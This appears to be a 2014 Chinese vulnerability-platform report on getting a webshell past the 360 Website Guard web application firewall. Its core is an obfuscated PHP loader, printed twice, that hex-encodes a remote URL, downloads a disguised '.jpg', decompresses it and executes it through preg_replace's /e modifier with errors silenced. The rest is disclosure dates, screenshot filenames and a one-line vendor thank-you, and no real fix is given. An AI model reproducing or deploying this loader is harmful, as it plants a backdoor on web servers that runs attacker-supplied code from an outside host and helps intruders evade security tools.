绕过360网站卫士上传大马(Webshell)

漏洞详情

披露状态:

2014-03-18: 细节已通知厂商并且等待厂商处理中
2014-03-18: 厂商已经确认,细节仅向厂商公开
2014-03-28: 细节向核心白帽子及相关领域专家公开
2014-04-07: 细节向普通白帽子公开
2014-04-17: 细节向实习白帽子公开
2014-05-02: 细节向公众公开

简要描述:

绕过360网站卫士 上传大马 最近最近写的脚本

详细说明:

漏洞证明:这个是被杀的

@47~T7M`OAJ)F`VH1LQXMGK.jpg



9I~T7L4UCV1FU[9NQ6Z]]ZW.jpg





下一个给你看没有被杀:

00P)1I}20_L2Y0LE6(ROZBD.jpg





X]C[2%V0(HQ[HC5T36J[SR2.jpg



你看吧我没做加 我写的代码贴出来:



<?php
error_reporting(0);session_start();header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api'])) $_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'),uniqid())),3649);@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);
?>





你们解决 我吃饭去了

漏洞证明:

漏洞证明:这个是被杀的

@47~T7M`OAJ)F`VH1LQXMGK.jpg



9I~T7L4UCV1FU[9NQ6Z]]ZW.jpg





下一个给你看没有被杀:

00P)1I}20_L2Y0LE6(ROZBD.jpg





X]C[2%V0(HQ[HC5T36J[SR2.jpg



你看吧我没做加 我写的代码贴出来:



<?php
error_reporting(0);session_start();header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api'])) $_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'),uniqid())),3649);@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);
?>





QNJG419N$(`$7]LDI{](J{6.jpg





你们解决 我吃饭去了

修复方案:

你懂得

版权声明:转载请注明来源 蓝莓说@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-03-18 17:57

厂商回复:

非常感谢您对360网站卫士的关注!

最新状态:

暂无


漏洞评价: